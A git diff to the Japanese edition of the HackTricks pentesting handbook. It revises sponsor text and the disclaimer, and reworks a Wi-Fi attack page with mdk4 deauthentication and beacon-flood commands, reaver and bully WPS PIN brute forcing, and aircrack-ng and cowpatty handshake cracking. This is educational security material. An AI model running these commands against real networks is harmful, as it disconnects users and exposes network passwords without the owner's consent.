diff --git a/.gitbook/assets/image (1) (3) (1) (1).png b/.gitbook/assets/image (1) (3) (1) (1).png new file mode 100644 index 000000000..4f2d7d140 Binary files /dev/null and b/.gitbook/assets/image (1) (3) (1) (1).png differ diff --git a/.gitbook/assets/image (1) (3) (1).png b/.gitbook/assets/image (1) (3) (1).png index 4f2d7d140..248451f19 100644 Binary files a/.gitbook/assets/image (1) (3) (1).png and b/.gitbook/assets/image (1) (3) (1).png differ diff --git a/.gitbook/assets/image (1) (3).png b/.gitbook/assets/image (1) (3).png index 248451f19..7ebaebfa3 100644 Binary files a/.gitbook/assets/image (1) (3).png and b/.gitbook/assets/image (1) (3).png differ diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png index 7ebaebfa3..8eae14f0f 100644 Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png index 8eae14f0f..ea50c990a 100644 Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ diff --git a/README.md b/README.md index 457c0033c..a0216cf36 100644 --- a/README.md +++ b/README.md @@ -40,7 +40,7 @@ _Hacktricksのロゴとモーションデザインは_ [_@ppiernacho_](https://w ![](.gitbook/assets/i3.png) -**Intigriti**は、**ヨーロッパで最も優れた**エシカルハッキングと**バグバウンティプラットフォーム**です。 +**Intigriti**は、ヨーロッパで最も優れたエシカルハッキングとバグバウンティプラットフォームです。 **バグバウンティのヒント**:ハッカーによって作成されたプレミアムな**バグバウンティプラットフォーム**である**Intigriti**に**サインアップ**してみてください!今日から[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)で報酬が最大**$100,000**まで獲得できます! @@ -51,7 +51,7 @@ _Hacktricksのロゴとモーションデザインは_ [_@ppiernacho_](https://w
\ -[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)を使用して、世界で最も高度なコミュニティツールによって強化された**ワークフローを簡単に構築**および**自動化**できます。 +[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)を使用して、世界で最も高度なコミュニティツールによって強化されたワークフローを簡単に構築および自動化できます。 今すぐアクセスを取得してください: @@ -59,7 +59,7 @@ _Hacktricksのロゴとモーションデザインは_ [_@ppiernacho_](https://w ### [HACKENPROOF](https://bit.ly/3xrrDrL) -
+
**HackenProofはすべての暗号バグバウンティの場所です。** @@ -86,7 +86,7 @@ HackenProofの報酬は、顧客が報酬予算を入金した後に発表され WebSecは**オールインワンのセキュリティ企業**であり、ペネトレーションテスト、**セキュリティ**監査、セキュリティ意識向上トレーニング、フィッシングキャンペーン、コードレビュー、エクスプロイト開発、セキュリティエキスパートの外部委託など、すべてを行っています。 -WebSecのもう一つの素晴らしい点は、業界平均とは異なり、WebSecは**自分たちのスキルに非常に自信を持っている**ということです。彼らのウェブサイトには「**ハックできなければ、支払いはありません!**」と記載されており、最高品質の結果を保証しています。詳細については、彼らの[**ウェブサイト**](https://websec.nl/en/)と[**ブログ**](https://websec.nl/blog/)をご覧ください! +WebSecのもう一つの素晴らしい点は、業界平均とは異なり、WebSecは**自分たちのスキルに非常に自信を持っている**ということです。彼らのウェブサイトには「**私たちがハックできなければ、お金は払いません!**」と記載されており、最高品質の結果を保証しています。詳細については、彼らの[**ウェブサイト**](https://websec.nl/en/)と[**ブログ**](https://websec.nl/blog/)をご覧ください! 上記に加えて、WebSecはHackTricksを**熱心にサポート**しています。 @@ -96,42 +96,42 @@ WebSecのもう一つの素晴らしい点は、業界平均とは異なり、We
-[**DragonJARは、コロンビアに拠点を置く主要な攻撃的なサイバーセキュリティ企業**](https://www.dragonjar.org/)です。DragonJARは、さまざまな分野やほとんどの技術における**ペネトレーションテスト**など、包括的な攻撃的なサイバーセキュリティサービス、**レッドチーム**の攻撃シミュレーション、**物理**セキュリティテスト、**ストレステスト**、ソーシャルエンジニアリング、ソース**コードのセキュリティレビュー**、サイバーセキュリティトレーニングを提供しています。さらに、彼ら +[**DragonJARは、コロンビアに拠点を置く主要な攻撃的なサイバーセキュリティ企業**](https://www.dragonjar.org/)です。DragonJARは、さまざまな分野やほとんどの技術における[**ペネトレーションテスト**](https://www.dragonjar.org/servicios-de-seguridad-informatica)など、包括的な攻撃的なサイバーセキュリティサービス、**レッドチーム**の攻撃シミュレーション、**物理**セキュリティテスト、**ストレステスト**、ソーシャルエンジニアリング、ソース**コードのセキュリティレビュー**、サイバーセキュリ ### [SYN CUBES](https://www.syncubes.com/)
-**セキュリティスキルをサービスとして提供する**プラットフォームは、**グローバルな攻撃的なセキュリティの専門知識とスマートな自動化**を組み合わせ、情報をリアルタイムで提供し、情報に基づいた意思決定を行うためのデータを提供します。 +**セキュリティスキルをサービスとして提供する**プラットフォームは、**グローバルな攻撃的なセキュリティの専門知識とスマートな自動化**を組み合わせ、情報をリアルタイムで提供し、意思決定に必要なデータを提供します。 {% embed url="https://www.syncubes.com/" %} ## ライセンス -**Copyright © Carlos Polop 2023. 他の指定がない限り(書籍にコピーされた外部情報は元の著者に帰属します)、Carlos Polopによる**[**HACK TRICKS**](https://github.com/carlospolop/hacktricks)**のテキストは**[**Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)**](https://creativecommons.org/licenses/by-nc/4.0/)**でライセンスされています。**\ +**Copyright © Carlos Polop 2023. それ以外の場所では(書籍にコピーされた外部情報は元の著者に帰属します)、Carlos Polopによる**[**HACK TRICKS**](https://github.com/carlospolop/hacktricks) **のテキストは**[**Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)**](https://creativecommons.org/licenses/by-nc/4.0/)**でライセンスされています。**\ **商業目的で使用する場合は、私に連絡してください。** ## **免責事項** {% hint style="danger" %} -この書籍『HackTricks』は教育および情報提供の目的でのみ使用することを意図しています。この書籍の内容は「現状のまま」提供され、著者および出版者は、この書籍内に含まれる情報、製品、サービス、または関連するグラフィックの完全性、正確性、信頼性、適合性、または利用可能性について、明示または黙示を問わず、いかなる種類の表明または保証も行いません。したがって、そのような情報に依存することは、完全に自己の責任です。 +この書籍『HackTricks』は教育および情報提供の目的でのみ使用されることを意図しています。この書籍内のコンテンツは「現状のまま」提供され、著者および出版者は、この書籍内に含まれる情報、製品、サービス、または関連するグラフィックの完全性、正確性、信頼性、適合性、または利用可能性について、明示または黙示を問わず、いかなる種類の表明または保証も行いません。したがって、そのような情報に依存する場合は、自己の責任において行ってください。 著者および出版者は、この書籍の使用に起因する、間接的または結果的な損失または損害、またはデータの損失または利益の損失を含む、いかなる損失または損害に対しても、一切の責任を負いません。 さらに、この書籍で説明されている技術やヒントは、教育および情報提供の目的でのみ提供されるものであり、いかなる違法または悪意のある活動にも使用してはなりません。著者および出版者は、違法または非倫理的な活動を是認または支持するものではなく、この書籍内に含まれる情報の使用は、ユーザー自身のリスクと裁量によるものです。 -ユーザーは、この書籍に含まれる情報に基づいて行われるすべての行動について、自己の責任を負い、これらの技術やヒントを実装しようとする場合は常に専門の助言と支援を求めるべきです。 +ユーザーは、この書籍内に含まれる情報に基づいて行われるすべての行動について、自己の責任を負い、これらの技術やヒントを実装しようとする場合は常に専門の助言と支援を求めるべきです。 -この書籍の使用により生じるいかなる損害、損失、または害に対しても、ユーザーは著者および出版者を一切の責任から免責し、解放することに同意します。 +この書籍を使用することで、ユーザーは、著者および出版者を、この書籍またはその中に含まれる情報の使用によって生じるいかなる損害、損失、または害に対しても、一切の責任と責任から解放することに同意します。 {% endhint %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 -* **サイバーセキュリティ企業で働いていますか? HackTricksであなたの会社を宣伝したいですか?またはPEASSの最新バージョンにアクセスしたいですか、またはHackTricksをPDFでダウンロードしたいですか?** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)**をチェックしてください!** -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)、私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを発見してください。 -* [**公式のPEASS&HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。 -* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォローしてください。** -* **ハッキングのトリックを共有するには、** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **および** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出してください。** +* **サイバーセキュリティ企業で働いていますか? HackTricksであなたの会社を宣伝したいですか?または、最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロードしたりしたいですか?**[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)**をチェックしてください!** +* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう、私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクション +* [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう +* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォローしてください。** +* **ハッキングのトリックを共有するには、**[**hacktricks repo**](https://github.com/carlospolop/hacktricks)**と**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。**
diff --git a/generic-methodologies-and-resources/pentesting-wifi/README.md b/generic-methodologies-and-resources/pentesting-wifi/README.md index 95a52ba68..c8006fca1 100644 --- a/generic-methodologies-and-resources/pentesting-wifi/README.md +++ b/generic-methodologies-and-resources/pentesting-wifi/README.md @@ -4,7 +4,7 @@ ☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 -* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください! +* **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください! * [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。 * [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。 * [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。** @@ -12,7 +12,7 @@ -
+
**HackenProofはすべての暗号バグバウンティの場所です。** @@ -42,7 +42,7 @@ iwconfig wlan0 mode monitor #Put in mode monitor iwconfig wlan0mon mode managed #Quit mode monitor - managed mode iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis ``` -EAPHammerは、802.11ネットワークでEAPフレームを悪用するためのツールです。EAPHammerは、EAPフレームを使用してネットワークに接続するクライアントを攻撃し、クライアントの認証情報を取得することができます。EAPHammerは、ネットワークの脆弱性をテストするために使用されることがあります。 +EAPHammerは、802.11ネットワークでEAPフレームを悪用するためのツールです。EAPHammerは、EAPフレームを使用してネットワークに接続するクライアントを攻撃し、クライアントの認証情報を取得することができます。このツールは、ネットワークの脆弱性をテストするために使用されます。 EAPHammerを使用するには、次の手順に従ってください。 @@ -53,7 +53,7 @@ EAPHammerを使用するには、次の手順に従ってください。 5. クライアントがネットワークに接続すると、EAPHammerは攻撃を実行します。 6. EAPHammerは、クライアントの認証情報を取得します。 -EAPHammerは、ネットワークのセキュリティをテストするための強力なツールです。ただし、EAPHammerを使用する前に、法的および倫理的な制限を理解し、遵守する必要があります。 +EAPHammerは、ネットワークのセキュリティをテストするための強力なツールです。ただし、合法的な目的のためにのみ使用してください。 ``` git clone https://github.com/s0lst1c3/eaphammer.git ./kali-setup @@ -62,11 +62,51 @@ git clone https://github.com/s0lst1c3/eaphammer.git Airgeddonは、ワイヤレスネットワークのペネトレーションテストに使用されるオールインワンのツールです。このツールは、さまざまな攻撃手法を使用して、WiFiネットワークの脆弱性をテストすることができます。 -Airgeddonは、ワイヤレスネットワークのスキャン、ハンドシェイクのキャプチャ、ハンドシェイクの解析、パスワードのクラックなど、さまざまな機能を提供しています。また、WPSピン攻撃やEvil Twin攻撃など、特定の攻撃手法もサポートしています。 +## 主な機能 -Airgeddonは、シンプルなコマンドラインインターフェースを備えており、ユーザーフレンドリーな操作が可能です。また、多くのワイヤレスカードとドライバをサポートしているため、さまざまな環境で使用することができます。 +- ワイヤレスネットワークのスキャンと検出 +- ハンドシェイクキャプチャの自動化 +- パスワードのクラック +- クライアントのディスコネクト +- ディスプレイの偽造 +- ワイヤレスネットワークのジャミング +- ワイヤレスネットワークの偽造 +- ワイヤレスネットワークの攻撃の自動化 -Airgeddonは、ワイヤレスネットワークのセキュリティをテストするための強力なツールであり、ペネトレーションテスターやセキュリティエンジニアにとって非常に有用です。 +## インストール + +Airgeddonは、Linuxディストリビューションで動作します。以下の手順に従って、Airgeddonをインストールしてください。 + +1. Airgeddonのリポジトリをクローンします。 + + ``` + git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git + ``` + +2. インストールスクリプトを実行します。 + + ``` + cd airgeddon + sudo bash airgeddon.sh + ``` + +3. インストールウィザードに従って、必要な依存関係をインストールします。 + +4. インストールが完了したら、Airgeddonを起動します。 + + ``` + sudo bash airgeddon.sh + ``` + +## 使用方法 + +Airgeddonの使用方法については、公式のドキュメントを参照してください。ドキュメントには、ツールの各機能の詳細な説明と使用例が含まれています。 + +- [Airgeddon公式ドキュメント](https://github.com/v1s1t0r1sh3r3/airgeddon/wiki) + +## 注意事項 + +Airgeddonは、合法的な目的のためにのみ使用してください。無断で他人のWiFiネットワークに侵入することは違法です。ネットワークの所有者の許可を得ることなく、Airgeddonを使用しないでください。 ```bash mv `which dhcpd` `which dhcpd`.old apt install isc-dhcp-server @@ -106,7 +146,7 @@ If you prefer to run airgeddon in a Docker container, you can follow these steps 6. Follow the on-screen instructions to use airgeddon within the Docker container. -By running airgeddon in a Docker container, you can ensure that all the necessary dependencies are included and avoid any potential conflicts with your host system. +By running airgeddon in a Docker container, you can isolate it from your host system and easily manage its dependencies. ```bash docker run \ --rm \ @@ -144,8 +184,8 @@ sudo python setup.py install # Install any dependencies * **DoS** * Deauthentication/disassociation -- すべてのクライアントを切断する(または特定の ESSID/クライアント) -* ランダムな偽 AP -- ネットワークを隠し、スキャナーをクラッシュさせる可能性がある -* AP を過負荷にする -- AP を停止させようとする(通常はあまり役に立たない) +* ランダムなフェイク AP -- ネットワークを隠し、スキャナーをクラッシュさせる可能性がある +* AP を過負荷にする -- AP を停止させようとする(通常はあまり有用ではありません) * WIDS -- IDS と遊ぶ * TKIP、EAPOL -- 一部の AP を DoS するための特定の攻撃 * **クラッキング** @@ -153,7 +193,7 @@ sudo python setup.py install # Install any dependencies * **WPA-PSK** * **WPS** ピンコードの「ブルートフォース」 * **WPA PMKID** のブルートフォース -* \[DoS +] **WPA ハンドシェイク** のキャプチャ + クラック +* \[DoS +] **WPA ハンドシェイク** のキャプチャ + クラッキング * **WPA-MGT** * **ユーザー名のキャプチャ** * **ブルートフォース** 認証情報 @@ -169,7 +209,7 @@ sudo python setup.py install # Install any dependencies ### 切断パケット -この種の攻撃で最も一般的な方法は、**切断**パケットを使用することです。これらはデバイスをアクセスポイントから切断する責任を持つ「管理」フレームの一種です。これらのパケットを偽造することが、[多くのWi-Fiネットワークをハックする](https://null-byte.wonderhowto.com/how-to/wi-fi-hacking/)鍵となります。ネットワークからいつでも任意のクライアントを強制的に切断することができます。これが行われる簡単さは、いくぶん恐ろしく、しばしばクラックのためのハンドシェイクを収集する一環として行われます。 +この種の攻撃で最も一般的な方法は、**切断**パケットを使用することです。これらはデバイスをアクセスポイントから切断する責任を持つ「管理」フレームの一種です。これらのパケットを偽造することが、[多くのWi-Fiネットワークをハッキングする](https://null-byte.wonderhowto.com/how-to/wi-fi-hacking/)鍵となります。ネットワークからいつでも任意のクライアントを強制的に切断することができます。これが行われる簡単さは、いくぶん恐ろしく、しばしばクラッキングのためのハンドシェイクを収集する一環として行われます。 この切断を一時的に利用してハンドシェイクを収集してクラックするだけでなく、これらの切断を続けることもできます。これにより、クライアントはネットワークからの切断パケットを受け取ることになります。これらのフレームは暗号化されていないため、多くのプログラムは管理フレームを利用して、ネットワーク上の1つまたはすべてのデバイスに対して偽造して送信します。\ **[ここ](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)からの説明です。** @@ -207,7 +247,7 @@ mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F **攻撃モードb: ビーコンフラッディング** -クライアントに偽のAPを表示するためにビーコンフレームを送信します。これにより、ネットワークスキャナーやドライバーがクラッシュすることがあります! +クライアントに偽のAPを表示するためにビーコンフレームを送信します。これにより、ネットワークスキャナーやドライバーがクラッシュすることもあります! ```bash # -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit # -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES) @@ -227,7 +267,7 @@ mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m ``` **攻撃モード p: SSIDプロービングとブルートフォース** -APをプローブし、応答をチェックします。SSIDが正しく非表示にされているか、APが送信範囲内にあるかを確認するのに役立ちます。ワードリストを使用して非表示のSSIDの**ブルートフォース**も可能です。 +APをプローブし、応答をチェックします。SSIDが正しく非表示にされているか、APが送信範囲内にあるかを確認するのに役立ちます。ワードリストを使用して非表示のSSIDをブルートフォースすることもできます。 **攻撃モード m: Michael対策の悪用** @@ -269,35 +309,35 @@ _**Airgeddon**_ は、前のコメントで提案された攻撃のほとんど WPSはWi-Fi Protected Setupの略です。これは、ルーターとワイヤレスデバイスの接続をより速く簡単にするためのワイヤレスネットワークセキュリティの標準です。**WPSは、**WPA** Personalまたは**WPA2** Personalセキュリティプロトコルで暗号化されたパスワードを使用しているワイヤレスネットワークにのみ適用されます。WPSは、基本的なツールとスキルを持つハッカーによって簡単にクラックされることができる非推奨のWEPセキュリティを使用しているワイヤレスネットワークでは機能しません。([ここから](https://www.digitalcitizen.life/simple-questions-what-wps-wi-fi-protected-setup)引用) -WPSは、ユーザーがネットワークに接続するために8桁のPINを使用しますが、最初の4桁がまずチェックされ、正しい場合には次に2番目の4桁がチェックされます。その後、最初の半分をブルートフォースし、次に2番目の半分をブルートフォースすることが可能です(11000通りの可能性のみ)。 +WPSは、ユーザーがネットワークに接続するために8桁のPINを使用しますが、最初の4桁がまずチェックされ、正しい場合には次に2番目の4桁がチェックされます。その後、最初の半分をブルートフォースし、次に2番目の半分をブルートフォースすることができます(11000通りの可能性のみ)。 ### WPSブルートフォース このアクションを実行するための2つの主要なツールがあります:ReaverとBully。 * **Reaver**は、WPSに対する堅牢で実用的な攻撃を行うように設計されており、さまざまなアクセスポイントとWPSの実装に対してテストされています。 -* **Bully**は、Cで書かれたWPSブルートフォース攻撃の**新しい実装**です。元のreaverコードに比べて、依存関係が少なく、メモリとCPUのパフォーマンスが向上し、エンディアンの処理が正しく行われ、より堅牢なオプションがあります。 +* **Bully**は、Cで書かれたWPSブルートフォース攻撃の**新しい実装**です。元のreaverコードに比べて、依存関係が少なく、メモリとCPUのパフォーマンスが向上し、エンディアンネスの正しい処理、より堅牢なオプションのセットを備えています。 -この攻撃は、**8桁のWPS PINコードの脆弱性**を利用しています。この問題のため、プロトコルはPINの最初の4桁に関する情報を公開し、最後の桁は**チェックサム**として機能し、WPS APのブルートフォースが容易になります。\ -一部のデバイスには、通常、攻撃を繰り返し試みるMACアドレスを**ブロックするブルートフォース保護**が含まれています。その場合、この攻撃の複雑さが増します。PINをテストする間にMACアドレスを**回転**する必要があります。 +この攻撃は、**8桁のWPS PINコードの弱点**を利用しています。この問題のため、プロトコルはPINの最初の4桁に関する情報を公開し、最後の桁はチェックサムとして機能するため、WPS APのブルートフォースが容易になります。\ +一部のデバイスには、通常、攻撃を繰り返し試みるMACアドレスをブロックする**ブルートフォース保護**が含まれていることに注意してください。その場合、この攻撃の複雑さが増します。PINをテストする間にMACアドレスを**回転**する必要があります。 -WPSの有効なコードが見つかった場合、BullyとReaverはそれを使用してネットワークを保護するために使用されるWPA/WPA2 PSKを見つけることができるため、必要な時にいつでも接続することができます。 +WPSの有効なコードが見つかった場合、BullyとReaverはそれを使用してネットワークを保護するために使用されるWPA/WPA2 PSKを見つけることができますので、必要な時にいつでも接続することができます。 ```bash reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3 ``` **スマートなブルートフォース** -すべての可能なPINを試す代わりに、攻撃対象のAPに利用可能な**PINが発見されているかどうか**(製造元のMACに依存)と、**PINソフトウェアが生成したPIN**をチェックするべきです。 +すべての可能なPINを試すことから始める代わりに、攻撃しているAPの利用可能な**PINが発見されているかどうか**(製造元のMACに依存)と、**PINソフトウェアが生成したPIN**をチェックするべきです。 - 既知のPINのデータベースは、特定の製造元のアクセスポイントに対して、同じWPS PINが使用されていることが知られているものです。このデータベースにはMACアドレスの最初の3オクテットと、この製造元に非常に可能性の高い対応するPINのリストが含まれています。 - WPS PINを生成するためのいくつかのアルゴリズムがあります。たとえば、ComputePINとEasyBoxは、アクセスポイントのMACアドレスを計算に使用します。ただし、ArcadyanアルゴリズムではデバイスIDも必要です。 ### WPS Pixie Dust攻撃 -Dominique Bongardは、一部のAPが**ノンス**(**E-S1**および**E-S2**として知られる)を生成する際に弱い方法を持っていることを発見しました。これらのノンスが何であるかを特定できれば、APのWPS PINを簡単に見つけることができます。なぜなら、APはPINをハッシュで私たちに提供する必要があり、それによってAPもPINを知っていることを証明し、クライアントが偽のAPに接続していないことを確認する必要があるからです。これらのE-S1とE-S2は、WPS PINを含む「ロックボックスを開けるための鍵」と言えます。詳細はこちら:[https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-\(Offline-WPS-Attack\)) +Dominique Bongardは、一部のAPが**ノンス**(**E-S1**および**E-S2**として知られる)を生成する際に弱い方法を持っていることを発見しました。これらのノンスが何であるかを特定できれば、APのWPS PINを簡単に見つけることができます。なぜなら、APはPINをハッシュで私たちに提供する必要があり、それによってAPもPINを知っていることを証明し、クライアントが偽のAPに接続していないことを示すためです。これらのE-S1とE-S2は、WPS PINを含む「ロックボックスを開けるための鍵」と言えます。詳細はこちら:[https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-\(Offline-WPS-Attack\)) -基本的に、一部の実装では認証通信中にPINが2つの部分に分解され、クライアントに送信される際にランダムなキーを使用することに失敗していたため、オフライン攻撃を使用して有効なPINをブルートフォースすることができました。 +基本的に、一部の実装では、認証通信中にPINが2つの部分に分解され、クライアントに送信される際にランダムなキーを使用することに失敗していたため、オフライン攻撃を使用して有効なPINをブルートフォースすることができました。 ``` reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv bully wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3 @@ -317,7 +357,7 @@ reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p '' * 5と6は**カスタムPIN**を試すことができます(もし持っている場合) * 7と8は**Pixie Dust攻撃**を実行します * 13は**NULL PIN**をテストすることができます -* 11と12は、利用可能なデータベースから選択したAPに関連するPINを**収集**し、ComputePIN、EasyBox、およびオプションでArcadyan(おすすめ、なぜなら)を使用して可能な**PIN**を**生成**します +* 11と12は利用可能なデータベースから選択したAPに関連するPINを**収集**し、ComputePIN、EasyBox、オプションでArcadyan(おすすめ、なぜなら)を使用して可能な**PIN**を**生成**します * 9と10は**すべての可能なPIN**をテストします ## **WEP** @@ -326,15 +366,15 @@ reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p '' ![](<../../.gitbook/assets/image (125).png>) -
+
**HackenProofはすべての暗号バグバウンティの場所です。** **遅延なしで報酬を受け取る**\ -HackenProofのバウンティは、顧客が報酬予算を入金した後に開始されます。バグが検証された後に報酬を受け取ることができます。 +HackenProofのバウンティは、顧客が報酬予算を入金した後にのみ開始されます。バグが検証された後に報酬を受け取ることができます。 **Web3ペントestingの経験を積む**\ -ブロックチェーンプロトコルとスマートコントラクトは新しいインターネットです!上昇期のweb3セキュリティをマスターしましょう。 +ブロックチェーンプロトコルとスマートコントラクトは新しいインターネットです!成長する日々のWeb3セキュリティをマスターしましょう。 **Web3ハッカーレジェンドになる**\ 各検証済みのバグごとに評判ポイントを獲得し、週間リーダーボードのトップを制覇しましょう。 @@ -355,7 +395,7 @@ HackenProofのバウンティは、顧客が報酬予算を入金した後に開 ``` PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA) ``` -**「PMK Name」の文字列が一定であるため、APとステーションのBSSID、および完全な4ウェイハンドシェイクから取得した「PMK」が同じであることがわかっている場合、hashcatはこれだけでPSKをクラックし、パスフレーズを回復することができます!**\ +**「PMK Name」文字列が一定であるため、APとステーションのBSSID、および完全な4ウェイハンドシェイクから取得した「PMK」が同じであることがわかっている場合、hashcatはこれだけでPSKをクラックし、パスフレーズを回復することができます!**\ [ここ](https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/)から取得した説明。 この情報を**収集**し、パスワードをローカルで**ブルートフォース攻撃**するには、次の手順を実行します: @@ -418,41 +458,20 @@ aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.c ```bash aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture ``` -**tshark** +**tshark**は、Wiresharkのコマンドライン版です。tsharkを使用すると、キャプチャファイルを解析し、ネットワークトラフィックの詳細な情報を表示することができます。以下は、tsharkの基本的な使用方法です。 -tshark is a command-line tool for capturing and analyzing network traffic. It is part of the Wireshark suite and provides similar functionality to Wireshark, but without the graphical user interface (GUI). - -tshark can be used to capture packets from a network interface or read packets from a capture file. It supports a wide range of capture filters and display filters to help you focus on specific network traffic. - -To capture packets from a network interface, you can use the following command: - -``` -tshark -i +```bash +tshark -r <キャプチャファイル> [オプション] ``` -Replace `` with the name of the network interface you want to capture packets from, such as `eth0` or `wlan0`. +- `-r <キャプチャファイル>`: 解析するキャプチャファイルのパスを指定します。 +- `[オプション]`: 追加のオプションを指定することができます。例えば、`-Y`オプションを使用してフィルタリング条件を指定することができます。 -To read packets from a capture file, you can use the following command: - -``` -tshark -r -``` - -Replace `` with the path to the capture file you want to analyze. - -tshark can also be used to apply display filters to analyze specific packets. For example, you can use the following command to display only HTTP packets: - -``` -tshark -r -Y http -``` - -Replace `` with the path to the capture file you want to analyze. - -tshark provides a wide range of options and features for capturing and analyzing network traffic. Refer to the tshark documentation for more information on how to use this powerful tool. +tsharkは非常に強力なツールであり、ネットワークトラフィックの解析に役立ちます。キャプチャファイルから情報を抽出するために、tsharkのフィルタリング機能を活用することが重要です。 ```bash tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages. ``` -[**cowpatty**](https://github.com/roobixx/cowpatty)は、WPA/WPA2のハンドシェイクキャプチャからパスワードを復号化するためのツールです。このツールは、事前共有キー(PSK)を使用して保護されたWi-Fiネットワークのパスワードをクラックするために使用されます。cowpattyは、辞書攻撃やブルートフォース攻撃などのさまざまな攻撃手法を使用して、パスワードを解読します。このツールは、Wi-Fiネットワークのセキュリティ評価やペネトレーションテストにおいて有用です。 +[**cowpatty**](https://github.com/roobixx/cowpatty)は、WPA-PSKハンドシェイクのオフライン攻撃を実行するためのツールです。このツールは、事前共有キー(PSK)を特定するために、ハンドシェイクキャプチャファイルを使用します。cowpattyは、辞書攻撃やルールベースの攻撃を実行するための高度なオプションを提供します。このツールは、WPAおよびWPA2ネットワークのセキュリティ評価において非常に有用です。 ``` cowpatty -r psk-01.cap -s "ESSID" -f - ``` @@ -471,15 +490,15 @@ pyrit -r psk-01.cap analyze ``` ### EAP(拡張認証プロトコル) -**認証通信**の**骨組み**である**EAP**(拡張認証プロトコル)の上に、サーバーは**認証アルゴリズム**を使用して**クライアント**(**サプリカント**)を認証し、一部の場合ではクライアントがサーバーを認証するためにも使用されます。 +**認証通信**の**骨組み**であるEAP(拡張認証プロトコル)の上に、サーバーは**認証アルゴリズム**を使用して**クライアント**(スプリカント)を認証し、一部の場合ではクライアントがサーバーを認証するためにも使用されます。 